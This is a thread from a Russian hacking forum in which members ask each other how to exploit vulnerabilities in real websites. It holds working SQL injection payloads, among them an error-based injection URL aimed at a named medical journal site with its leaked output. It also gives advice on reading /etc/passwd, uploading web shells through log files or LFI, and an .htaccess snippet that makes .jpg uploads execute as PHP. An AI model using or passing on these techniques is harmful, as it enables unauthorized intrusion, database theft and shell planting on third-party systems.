Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Дыры нету, просто при отрицательном параметре ошибка.
     
  2. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    84
    Likes Received:
    2
    Reputations:
    -5
    Как узнать путь на хостинге, имея sql-inj?
    Вот таблицы с данными админки нет, делаю
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --

    пишет
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt --' at line 1
     
  3. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Одинаковый.Что значит мудаки?
     
  4. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    короче просто некоторым пользователям выставили ограничение на заливку файло,там обновление.
    теперь надеюсь понятно?!?!
    МУДАКИ-->значит мудаки:)
     
  5. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Мудаки, потому, что базу засирают.
    foma9999, мм, похоже на error based, но очень странная. Я не смог раскрутить. Софт тоже не взял. Спроси у Ereee.
     
  6. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    84
    Likes Received:
    2
    Reputations:
    -5
    http://i.imgur.com/y2VVs.png
    http://i.imgur.com/ULCKV.png

    Как сливать базу в таком виде?
     
    #19866 foma9999, 20 Mar 2012
    Last edited: 20 Mar 2012
  7. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    так не бывает
     
  8. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    84
    Likes Received:
    2
    Reputations:
    -5
    http://www.globalomsk.ru/directory/user.php

    Есть sql?
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    если есть права на чтение запись то прочитай файл etc/passwd

    да, там в форме входа
     
    #19869 qaz, 20 Mar 2012
    Last edited: 20 Mar 2012
  10. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    да вы уже со всем обленились((((
    берите toolza,sqlmap и вперёд
    я думаю такие посты либо сразу delete либо выговор какой нить,модеры позаботьтесь об этом
     
    #19870 Faaax, 21 Mar 2012
    Last edited: 21 Mar 2012
  11. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Ребят, что делать если proc/self/environ пуст?
    Хотя тут всё ок
    proc/self/status
    proc/self/cmdline (/usr/sbin/apache2-kstart)
    etc/passwd
     
    #19871 Fooog, 21 Mar 2012
    Last edited: 27 Mar 2012
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Fooog
    Во-первых, к переменным окружения не всегда есть доступ.
    Во-вторых, там не всегда есть данные, которыми можно манипулировать.
    В -третьих, твои слова:
    Звучат весьма, мммммм, эпично =\
     
  13. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    ну так а что в таком случае делать?
     
    #19873 Fooog, 21 Mar 2012
    Last edited: 27 Mar 2012
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    искать логи и заливать шел через них
     
  15. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Если на сервере (именно на всем сервере на любом сайте) есть phpinfo - можно спокойно залить шелл через LFI.
     
  16. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    133
    Likes Received:
    40
    Reputations:
    26
    как раскрутить через error based?
    http://www.sirirajmedj.com/content.php?content_id=2554
     
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Например так:
    http://www.sirirajmedj.com/content.php?content_id=2554+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
    Смотри исходник(внизу):
    Code:
    <!--SQL: SELECT c.journal_id, c.section_id, c.subject, c.address, c.abstract, c.keyword, c.keyword, c.pdf_file, c.start_page, c.end_page FROM medj_content as c WHERE c.status = 1 AND c.content_id = 2554 and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
    MySQL: Duplicate entry '[COLOR=Red]COLLATIONS[/COLOR]1' for key 1-->
     
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а вот такой вопрос, залил шелл на сайт через админку, открываю его а мне пишет
    500 Внутренняя ошибка сервера, я тут гдето видел что нужно залить файл htaccess а что в нём должно быть написано чтобы всё работало?
     
  19. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Code:
    AddType application/x-httpd-php .jpg 
    AddHandler application/x-httpd-php .jpg
    
     
  20. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    133
    Likes Received:
    40
    Reputations:
    26
    спасибо большое, ток я не могу тебе + поставить :)
     
Loading...
Thread Status:
Not open for further replies.